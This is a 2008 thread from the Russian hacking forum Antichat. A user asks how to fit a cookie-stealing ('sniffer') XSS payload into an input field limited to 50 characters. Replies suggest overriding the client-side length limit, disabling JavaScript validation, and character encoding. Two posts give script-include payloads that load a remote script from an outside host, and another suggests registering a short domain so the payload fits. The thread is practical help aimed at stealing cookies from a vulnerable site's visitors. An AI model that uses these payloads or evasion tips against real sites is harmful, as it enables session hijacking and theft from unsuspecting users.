ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Оффтоп > Болталка
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Обход ограничений символов (xss) ?
  #1  
Старый 21.07.2008, 19:03
Аватар для geforse
geforse
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841

Репутация: 712


Отправить сообщение для geforse с помощью ICQ
По умолчанию Обход ограничений символов (xss) ?

Вот есть поле, там работает алерт, но ввод символов ограничен...как можно обойти данное ограничение ? (для снифера)
 
Ответить с цитированием

  #2  
Старый 21.07.2008, 19:12
Аватар для Shred
Shred
Участник форума
Регистрация: 22.05.2006
Сообщений: 232
Провел на форуме:
561037

Репутация: 73
По умолчанию

возможно ограничение реализовано путём выставления значения size, попробуй сохранить страницу, переопредели это значеие для уязвимого поля на более длинное, пропишу полнуй путь к скрипту и попробуй выполнить. Второй вариант, то что возможно проверка реализована только ява скриптом, нада либо найти это место и вырезать либо отключить выполнение жабаскрипта, но тогда ты сам не увидишь результат выполнения . Но это всё оочень мало вероятно и скорей всего проверка и на клиенте и на серванте
 
Ответить с цитированием

  #3  
Старый 21.07.2008, 19:30
Аватар для BlackSun
BlackSun
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345

Репутация: 4589


По умолчанию

Цитата:
но ввод символов ограничен
И что мы под этим должны понимать? ограничение по размеру или фильтрация? а может поле заколдовано и на хакеров, пытаюшихся его заxssить наводится порча?
 
Ответить с цитированием

  #4  
Старый 21.07.2008, 19:42
Аватар для Chaak
Chaak
Познавший АНТИЧАТ
Регистрация: 01.06.2008
Сообщений: 1,047
Провел на форуме:
5321514

Репутация: 3313


Отправить сообщение для Chaak с помощью ICQ
По умолчанию

юзай кодировку в чарс
 
Ответить с цитированием

  #5  
Старый 21.07.2008, 19:43
Аватар для Qwazar
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912

Репутация: 4693


По умолчанию

Код:
<script src="http://www.ya.ru/1.js"></script>
- короче ничего не знаю
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.
 
Ответить с цитированием

  #6  
Старый 21.07.2008, 19:48
Аватар для mr.The
mr.The
Познавший АНТИЧАТ
Регистрация: 30.04.2007
Сообщений: 1,206
Провел на форуме:
4778940

Репутация: 1257


Отправить сообщение для mr.The с помощью ICQ
По умолчанию

инклудом
Цитата:
<SCRIPT SRC=http://xek.site/xss.js></SCRIPT>
 
Ответить с цитированием

  #7  
Старый 21.07.2008, 20:01
Аватар для geforse
geforse
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841

Репутация: 712


Отправить сообщение для geforse с помощью ICQ
По умолчанию

в поле можно водить только 50 символов.
инклуд, самое оно но нужен короткий домен(
 
Ответить с цитированием

  #8  
Старый 21.07.2008, 20:17
Аватар для Qwazar
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912

Репутация: 4693


По умолчанию

Купи, трёхбуквенники ещё остались.
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор Уязвимостей .:Drupal :. ] Cawabunga Сценарии/CMF/СMS 7 04.02.2010 02:55
Обход ограничений Fat32/ntfs (си) DaemoniZ С/С++, C#, Delphi, .NET, Asm 8 03.05.2008 19:47
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23
Обход регистрации в Invision Power Board v1.3 Final DeeIP Форумы 1 10.04.2005 20:35



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ